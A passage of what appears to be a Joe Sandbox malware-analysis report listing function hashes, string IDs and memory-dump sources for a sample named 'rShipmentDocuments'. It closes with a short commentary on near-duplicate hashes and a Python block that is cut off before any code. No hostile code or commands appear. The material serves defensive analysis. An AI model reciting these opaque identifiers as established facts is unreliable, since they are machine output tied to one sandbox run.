                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                      • API String ID: 0-2525668591
                                                      • Opcode ID: 3014f164fe4d1f186ae95a10d1b0fca181fb4a184feb2dedaca2414e1f1823bb
                                                      • Instruction ID: da066856390e61ef9b3f9b2f300f8e1b9e00a7a663e10194462894a0410f0b8c
                                                      • Opcode Fuzzy Hash: 3014f164fe4d1f186ae95a10d1b0fca181fb4a184feb2dedaca2414e1f1823bb
                                                      • Instruction Fuzzy Hash: 0AE12AB1A00119DFCB16CFA9DC84AADFBF2BF88354F658465F815AB265DB30E841CB50

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: 4ea67ad1f1b2e3332a490256dfaa82c53b588ff69d431216161a031f17af70b0
                                                      • Instruction ID: 82dceeed55a648ded2500ddcaf9f7301a75f0744e0c2aa85d9793e732a4b422c
                                                      • Opcode Fuzzy Hash: 4ea67ad1f1b2e3332a490256dfaa82c53b588ff69d431216161a031f17af70b0
                                                      • Instruction Fuzzy Hash: CAA1F674E00218DFDB15DFAAD884A9DFBF2BF89310F14806AE409AB365DB349945CF50

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: 7440f7252be5473cf6302b1bbdc84f692786c75be56922eb0a9125a9bc75a362
                                                      • Instruction ID: 82a5586cd7bda9d86393ab29115d22a2804458f18e8f290a0f4908ee431a2cce
                                                      • Opcode Fuzzy Hash: 7440f7252be5473cf6302b1bbdc84f692786c75be56922eb0a9125a9bc75a362
                                                      • Instruction Fuzzy Hash: 1B91D675E00218CFDB19CFA9D984A9DBBF2BF89300F14C069E419AB365DB349985CF50

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: 5fce64fd6c18bdc8d9e2dd4f08bdae3d9baa15e2ff355e74210d2f72463c0fac
                                                      • Instruction ID: 270e26c4f4bb74ad98b5ad1ee8a7ac8bcae669dd186aba7ad1e5e4c2e03e77f0
                                                      • Opcode Fuzzy Hash: 5fce64fd6c18bdc8d9e2dd4f08bdae3d9baa15e2ff355e74210d2f72463c0fac
                                                      • Instruction Fuzzy Hash: FA81C274E00218CFDB55DFAAD984A9DBBF2BF88310F14D06AE419AB365DB349981CF50

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: af1da54a1f56697337879f760266ec75388dc587325f2e71185a79411bbc5462
                                                      • Instruction ID: 52a6cc1f5a85f4cdac7e202d7e94cda891bc9b4504ef63a5a2c0f4a8b18f776a
                                                      • Opcode Fuzzy Hash: af1da54a1f56697337879f760266ec75388dc587325f2e71185a79411bbc5462
                                                      • Instruction Fuzzy Hash: 6C81B274E00218CFDB54DFAAD984A9DBBF2BF88310F14C06AE419AB365DB349985CF50

                                                      Control-flow Graph (starting at block 2a3d278; graph rendering not reproduced in this text export)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: c486b68b1b369d59195e807b729d63816e81866f4a0b5d03ac807e95c4571a66
                                                      • Instruction ID: 6b5563855441ab75a69a7c2f66f32d6c7c9cd78879d584ba5bf25bf102e95a41
                                                      • Opcode Fuzzy Hash: c486b68b1b369d59195e807b729d63816e81866f4a0b5d03ac807e95c4571a66
                                                      • Instruction Fuzzy Hash: D481B474E00618CFDB58DFAAD984A9DBBF2BF88310F14C069E419AB365DB349985CF10

                                                      Control-flow Graph (starting at block 2a3c738; graph rendering not reproduced in this text export)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: 9f459acc4efff3c1eba80d66313e474073436c450bbff7d1c03248f6d4da1593
                                                      • Instruction ID: e576b38d39a35b3baba00a923e5d24ea5b17e51e23d588a5dd45854e761d57ac
                                                      • Opcode Fuzzy Hash: 9f459acc4efff3c1eba80d66313e474073436c450bbff7d1c03248f6d4da1593
                                                      • Instruction Fuzzy Hash: 2681A074E00218CFDB15DFAAD984A9DBBF2BF88310F14C06AE419AB365DB349981CF50

                                                      Control-flow Graph (starting at block 2a3ccd8; graph rendering not reproduced in this text export)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: 02062cb7561a68aa00914c4ab1e0d8ddd61dacd830dfbe7e98908b8bc92a12fe
                                                      • Instruction ID: d0d97f6818f1bb9f589f866ed1ab240a8415c18c78d96959d54ad8a4ff244e2b
                                                      • Opcode Fuzzy Hash: 02062cb7561a68aa00914c4ab1e0d8ddd61dacd830dfbe7e98908b8bc92a12fe
                                                      • Instruction Fuzzy Hash: D181B674E00218DFDB54DFA9D984A9DBBF2BF88310F24C06AE419AB365DB349985CF50

                                                      Control-flow Graph (starting at block 2a3cfaa; graph rendering not reproduced in this text export)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: 952a2de2d8d09cde92e4ca73538dfb2a268117538e1eec0d81eaa6229806075d
                                                      • Instruction ID: 46ff1b2c2a5a6f25bc8c152c0e8bc6cafdfa78bc30c357531129b5d75e97bb52
                                                      • Opcode Fuzzy Hash: 952a2de2d8d09cde92e4ca73538dfb2a268117538e1eec0d81eaa6229806075d
                                                      • Instruction Fuzzy Hash: 9B81B274E00618CFDB58DFAAD984A9DBBF2BF88300F14C069E419AB365DB349985CF10
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o^q$4'^q
                                                      • API String ID: 0-273632683
                                                      • Opcode ID: 79766bbb12b6081ee40a6d4742ad39b56edd2fe942dfb865be3bd92315fdd28e
                                                      • Instruction ID: df98e519de122583cdd5f457744a588353c8392297b83493db5394c643f8bccb
                                                      • Opcode Fuzzy Hash: 79766bbb12b6081ee40a6d4742ad39b56edd2fe942dfb865be3bd92315fdd28e
                                                      • Instruction Fuzzy Hash: C3826B31A00219DFCB16CFA8C984AAEBBF2FF88314F158559F4459B366DB31E991CB50

                                                      Control-flow Graph (starting at block 2a369b0; graph rendering not reproduced in this text export)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o^q$Hbq
                                                      • API String ID: 0-662517225
                                                      • Opcode ID: 254b1ccc7b279b2cfaab3fff55d47cfb695fac117ff9251513a15010c0d5d904
                                                      • Instruction ID: f24b50cc70dcfa3e79d97d656ab8ffe772206d34791dd7214e39573ff921630d
                                                      • Opcode Fuzzy Hash: 254b1ccc7b279b2cfaab3fff55d47cfb695fac117ff9251513a15010c0d5d904
                                                      • Instruction Fuzzy Hash: 5B229D70A002199FCB15DF69C894BAEBBFABF88704F248469E815DB390DF349D41CB94
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e95215d050e7d0f41eb0368b94d050f4c4e0f6533f6a6fcba45c581d87f8e0c3
                                                      • Instruction ID: 4b4e8005468d779a3c05e3e8026a4b90a5148bc69f416f670fa070af3e7021e6
                                                      • Opcode Fuzzy Hash: e95215d050e7d0f41eb0368b94d050f4c4e0f6533f6a6fcba45c581d87f8e0c3
                                                      • Instruction Fuzzy Hash: 57223570E10218CFDF64DFA9C884B9DBBB2BF88304F1085A9E519AB355DB349985CF91
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d88814e3be409feab395fa6ea7e8bc865ad64908c763470df1317f3abf7f48f
                                                      • Instruction ID: a967c97056bcfaaab2517ef2ec6d29c2c27a94ec1715075a1a13655515b12619
                                                      • Opcode Fuzzy Hash: 6d88814e3be409feab395fa6ea7e8bc865ad64908c763470df1317f3abf7f48f
                                                      • Instruction Fuzzy Hash: 5572DD74E01228CFDBA4DF69C984BEDBBB2BB49304F1491E9E549A7255DB309E81CF40
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5fec321d6f4f25e020f9d961abcd26c0ab0e723f81f4328a0c7c7c19b23a26e6
                                                      • Instruction ID: e09d307f1a24a4873efc5b1346f8066bbde028a8a5cd65f54fe53b7444d1c615
                                                      • Opcode Fuzzy Hash: 5fec321d6f4f25e020f9d961abcd26c0ab0e723f81f4328a0c7c7c19b23a26e6
                                                      • Instruction Fuzzy Hash: CAC1B274E11218CFDB54DFA9C954B9DBBB2BF89300F2080A9D909AB354DB359E85CF50
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70446b76604ba89797cd79bb4bade4f577d0db1f1ec1ead4dcac04f654aa0cfd
                                                      • Instruction ID: 3db8a9546760f7bf7551cee2d5ba514cd2cf683c33d4dc152ccfa02a1137b1c4
                                                      • Opcode Fuzzy Hash: 70446b76604ba89797cd79bb4bade4f577d0db1f1ec1ead4dcac04f654aa0cfd
                                                      • Instruction Fuzzy Hash: 4AC1AE74E01218CFDB54DFA5D994B9DBBB2BF88304F2080A9D809AB364DB359E85CF50
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3d20cedd17989b0c9686b9725f6d5c63b5d1e2fbc44862c743c68818830db37c
                                                      • Instruction ID: df5268d9453363c3805ecf1702dbb619f7c82b6696f9cbdfb404a7c866db045a
                                                      • Opcode Fuzzy Hash: 3d20cedd17989b0c9686b9725f6d5c63b5d1e2fbc44862c743c68818830db37c
                                                      • Instruction Fuzzy Hash: 2EA10370D10208CFDB24DFA9C994B9DBBB1FF88314F209269E508AB3A1DB745A85CF51
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd102f061f870f4e7d46b4f4a012fcd1dd046074895196b561bf97859f5868c9
                                                      • Instruction ID: 344fdb03b51253c89139dbf97c3c9da038ea154f78d8f2fa7ab666462d238c24
                                                      • Opcode Fuzzy Hash: bd102f061f870f4e7d46b4f4a012fcd1dd046074895196b561bf97859f5868c9
                                                      • Instruction Fuzzy Hash: 64A10370D10208CFDB14DFA9C994B9DBBB1FF89314F209269E509AB3A1DB749A85CF50
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 18d4e3173154d81e78bf5a618c7d05db2ad9470471bd2316f451017b31f7401a
                                                      • Instruction ID: 0cbe995f3e1cf588c4136078186441d2c67b07b3a216ff151962ef0c642ce459
                                                      • Opcode Fuzzy Hash: 18d4e3173154d81e78bf5a618c7d05db2ad9470471bd2316f451017b31f7401a
                                                      • Instruction Fuzzy Hash: AF911370D10218CFEB50DFA8C894BDCBBB1FF49314F209269E609AB291DB759A85CF54
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 76a1c54be5b5870dadda5ff19d7ec31ca23139187b44ced7bd366f85814e2e94
                                                      • Instruction ID: 2ac8720809c36b4977b3bb384e955fa82568de51c3fc17aa74965e0419b2ecac
                                                      • Opcode Fuzzy Hash: 76a1c54be5b5870dadda5ff19d7ec31ca23139187b44ced7bd366f85814e2e94
                                                      • Instruction Fuzzy Hash: 63519374E00208DFDB19DFAAD584A9DBBF2BF88310F248529E819BB364DB319945CF54
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 028776c89e8160c6309cec676d04367d14247ed38fa162cd544d18856d97aaaa
                                                      • Instruction ID: f62f32295f7441a899fbb55c2cb3f57dd59348a1486912d7e3e4f498835f2a15
                                                      • Opcode Fuzzy Hash: 028776c89e8160c6309cec676d04367d14247ed38fa162cd544d18856d97aaaa
                                                      • Instruction Fuzzy Hash: 5951B374E00208DFDB19DFAAD984A9DBBB2FF88310F24C529E815AB364DB319845CF54

                                                      Control-flow Graph (starting at block 2a376f1; graph rendering not reproduced in this text export)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                      • API String ID: 0-1932283790
                                                      • Opcode ID: 24897c45cab754d2c22b34652dfa4e2f939b538257b674cd9c55ba9b29236c19
                                                      • Instruction ID: 14ff931741d9b19b9a2694d5d93159348cba91e4eb33ffb57c7ce07acd78e78f
                                                      • Opcode Fuzzy Hash: 24897c45cab754d2c22b34652dfa4e2f939b538257b674cd9c55ba9b29236c19
                                                      • Instruction Fuzzy Hash: 2F122770A002099FCB16CF69D984AAEFBF2FF48314F158599F41A9B261DB30ED45CB50

                                                      Control-flow Graph (starting at block 2a36498; graph rendering not reproduced in this text export)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,bq$,bq
                                                      • API String ID: 0-2699258169
                                                      • Opcode ID: a061cd003b03d53e5246b3adc94b4cd4beee814380d1a901c4fa4de2651b2af2
                                                      • Instruction ID: 749b55146fa5e156c2797a245d741e993def9a525d156a8ce2d2048e17520911
                                                      • Opcode Fuzzy Hash: a061cd003b03d53e5246b3adc94b4cd4beee814380d1a901c4fa4de2651b2af2
                                                      • Instruction Fuzzy Hash: F281D031B00505EFCB1ACF69C884A6ABBFAFF89A44B158169E405EB364DF31E841CB54

                                                      Control-flow Graph
                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph: basic blocks in 2a35f5c-2a3625b; call sites at 2a35fba (candidate targets 2a360a0 or 2a35f5c, i.e. the function's own start), 2a35ff9 (2a369a0 or 2a369b0), 2a36011 (2a3aef0, 2a3af00, 2a3aeba or 2a3afad) and 2a36167 (2a362f0 or 2a36300) (node/edge listing of the rendered graph omitted)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hbq$Hbq
                                                      • API String ID: 0-4258043069
                                                      • Opcode ID: 720732296fd141e093dadf035c9caa5a59e142f5184e2b7f3c63ccdb8434ab80
                                                      • Instruction ID: cfb2e50b9d0a14c2ea152ce7627e2ac51ba195d66262f314c4ddb74382909956
                                                      • Opcode Fuzzy Hash: 720732296fd141e093dadf035c9caa5a59e142f5184e2b7f3c63ccdb8434ab80
                                                      • Instruction Fuzzy Hash: 6551BE35B04255EFDB169F24D894B6E7BBAFF89744F048829F8428B291DF39C811CB94
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q
                                                      • API String ID: 0-2697143702
                                                      • Opcode ID: 6682393314bb0dd2d014361dac1d59c47e7f72dd2845e18449c8ab44a79d5f81
                                                      • Instruction ID: 5ca03bf981ddcfe4a20c527430fcdd40bccb03e9ee572217503c3e7d6b6b9b41
                                                      • Opcode Fuzzy Hash: 6682393314bb0dd2d014361dac1d59c47e7f72dd2845e18449c8ab44a79d5f81
                                                      • Instruction Fuzzy Hash: 6A519F317002069FDB06DF69D884B6BBBEAEB88350F048466F919CB355DBB5DC41CBA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Xbq$Xbq
                                                      • API String ID: 0-1243427068
                                                      • Opcode ID: 85964c9836b4ec61d401ba4c08b2a35a578afa93886f8354966a640feea66f94
                                                      • Instruction ID: 115bbb1fa17ccf7b0a37effd39afadf7608efba949c2ce35559d55434769be2f
                                                      • Opcode Fuzzy Hash: 85964c9836b4ec61d401ba4c08b2a35a578afa93886f8354966a640feea66f94
                                                      • Instruction Fuzzy Hash: 8A312335B0C3248BDF1A4B6A89D437EA6AAABC4285F144C7AF802C3384DF75CC4487D0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $^q$$^q
                                                      • API String ID: 0-355816377
                                                      • Opcode ID: 21cd533e5359b56be627fb3d7854b111aaa55b0f901c4eeeb5edb668fa35b986
                                                      • Instruction ID: f49796b35c1503f6496ee9b7dcad07d11697de7e6ced0f0a09440394cc614fc0
                                                      • Opcode Fuzzy Hash: 21cd533e5359b56be627fb3d7854b111aaa55b0f901c4eeeb5edb668fa35b986
                                                      • Instruction Fuzzy Hash: 83319F303442158FDB2A9B29D994B3E77A7BB84754B24486BF012CF292EF2CDC85C755
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LR^q
                                                      • API String ID: 0-2625958711
                                                      • Opcode ID: aba7deaa5250d976586a660258a7641fc986d8150e3a881f908111486ac42ffa
                                                      • Instruction ID: 4244cac2e8e0a2cd902b1c232e9d4de0c8871073a91ab9a6e8bda4b91c6d08c9
                                                      • Opcode Fuzzy Hash: aba7deaa5250d976586a660258a7641fc986d8150e3a881f908111486ac42ffa
                                                      • Instruction Fuzzy Hash: 9552B478D40259CFCF54EF24E984B99BBB2FB49305F5089A9D409AB358DB306E85DF80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LR^q
                                                      • API String ID: 0-2625958711
                                                      • Opcode ID: d1b1c85f9dc0a19d6ab367db7b467de4ca5ebac96d836ee574b44c61e2fba95a
                                                      • Instruction ID: 9e2be985f039223e5edd9025c67f8b10d4064212a883959a8c4a3723cd2e096f
                                                      • Opcode Fuzzy Hash: d1b1c85f9dc0a19d6ab367db7b467de4ca5ebac96d836ee574b44c61e2fba95a
                                                      • Instruction Fuzzy Hash: F052B478D40219CFCF54EF24E984B99BBB2FB49305F5089A9D409AB358DB306E95DF80
                                                      APIs
                                                      • LdrInitializeThunk.NTDLL(00000000), ref: 068F9A6E
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e3af2998e8c2aea2365a781d882fbe642b83895b2baecfe8b81b36df11454d61
                                                      • Instruction ID: 35ab9bdc8774a869494f6aa4f3ffb9c597d4c9be2622b34f51e4f873157b5a6b
                                                      • Opcode Fuzzy Hash: e3af2998e8c2aea2365a781d882fbe642b83895b2baecfe8b81b36df11454d61
                                                      • Instruction Fuzzy Hash: 6F117974E102098FDF44DFA8D884BADBBF5FF88318F248165EA04E7245DB30A941CB60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o^q
                                                      • API String ID: 0-74704288
                                                      • Opcode ID: 4bbe2fb931d95b859d256e24ee333296d47d3871c333954bd50b3b3e05827dfd
                                                      • Instruction ID: f5022d98574a736096e7d7e24cc2b4a5d71e5a164976ea2b65cc602d5d3d46db
                                                      • Opcode Fuzzy Hash: 4bbe2fb931d95b859d256e24ee333296d47d3871c333954bd50b3b3e05827dfd
                                                      • Instruction Fuzzy Hash: 23118836B40104DFCB01DFA4E885BA9BBF5BB88250F144426F616DB2A1DB31EC10CB60
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 439786d4f9608657b073e73c4e20b319438599535e4b5afb439ebbbec4fd9492
                                                      • Instruction ID: 7032345703644a1a572fae90a54f363eb05de806e3b9886bf763f0f3eca241d4
                                                      • Opcode Fuzzy Hash: 439786d4f9608657b073e73c4e20b319438599535e4b5afb439ebbbec4fd9492
                                                      • Instruction Fuzzy Hash: 8D12AC748A1246CFEA402F30E1AC13E7B61FF5F3A3B45AD04F11F8E4459B7594A8CA66
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1d178de79acf17deff961dae6d35d9df2406468667e84354c5ddb9d71a40a470
                                                      • Instruction ID: fbebbee1d3e451f128323ba668b7d212b58a49799f30a910003f3e4ae96c3ea6
                                                      • Opcode Fuzzy Hash: 1d178de79acf17deff961dae6d35d9df2406468667e84354c5ddb9d71a40a470
                                                      • Instruction Fuzzy Hash: 59129C748A1246CFEA402F30E1AC13E7B61FF5F3A3B45AD04F11F8E4459B7594A8CA66
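Several of the entries above carry almost identical "Instruction Fuzzy Hash" values (the two LR^q functions at 2a30000, and the two unnamed functions with Opcode IDs 439786d4... and 1d178de7...), which is the report's way of saying the dumped region contains duplicated or lightly varied copies of the same routine. The following is an added example, not code from the Joe Sandbox report or from the sandbox itself: it compares the printed digests position by position to surface such near-duplicates. The fuzzy-hash algorithm is not documented on the page, so a positional nibble comparison is assumed to be a usable proxy (the leading nibbles, which differ most between near-identical functions and may encode size, are treated like any other position); the hash values are copied from the entries above and keyed by the first eight characters of each entry's Opcode ID.

```python
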